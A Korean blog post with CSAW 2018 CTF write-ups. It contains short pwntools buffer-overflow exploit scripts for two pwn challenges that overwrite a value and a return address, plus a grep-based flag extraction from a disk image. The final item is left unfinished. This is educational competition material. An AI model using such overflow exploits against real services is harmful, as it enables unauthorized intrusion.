Write-up

[CSAW 2018] writeup

ch4rli3kop 2018. 9. 21. 19:27
반응형
매우매우 간단한 문제들쓰

system

bigboy
매우매우 간단한 bof 문제

/*exploit code*/
from pwn import *

r = remote('pwn.chal.csaw.io' ,9000)
#r = process("./boi")
context.log_level = 'debug'

r.recvline()
a = "A" * 0x14
a += p64(0xcaf3baee)
r.sendline(a)
r.interactive()



get it?
여윽시 매우매우 간단한 bof

/*exploit code*/
from pwn import *

#r = process("./get_it")
r = remote("pwn.chal.csaw.io", 9001)
context.log_level = 'debug'

r.recvline()

a = "A" * 0x28
a += p64(0x004005B6)
r.send(a)

r.interactive()


Forensic

rewind
문제 설명은 다음과 같다.


문제 파일을 다운로드 받아 file 명령어로 살펴보면, 다음과 같이 data 와 QEMU disk image 파일인 것을 확인할 수 있다.


> strings rewind-rr-snp | grep "flag{"
혹은
> grep -a "flag{.*}" rewind-rr-snp
명령어로 박혀있는 플래그를 읽어올 수 있다.


image 파일에 보통 flag가 하드코딩되어 있는 경우가 있긴하던데 이 문제도 그럴줄은 몰랐다..





simple_recovery



주어진 파일 속에 존재하는 disk.img0 는... 


...음


반응형

'Write-up' 카테고리의 다른 글

[InCTF 2018] Magical Radio writeup  (0) 2018.10.20
[InCTF 2018] writeup  (0) 2018.10.16
[SECURITYFEST 2018] sshnuke writeup  (0) 2018.06.03
[SECURITYFEST 2018] zion writeup  (0) 2018.06.03
[SECURITYFEST 2018] Mr.reagan  (0) 2018.06.03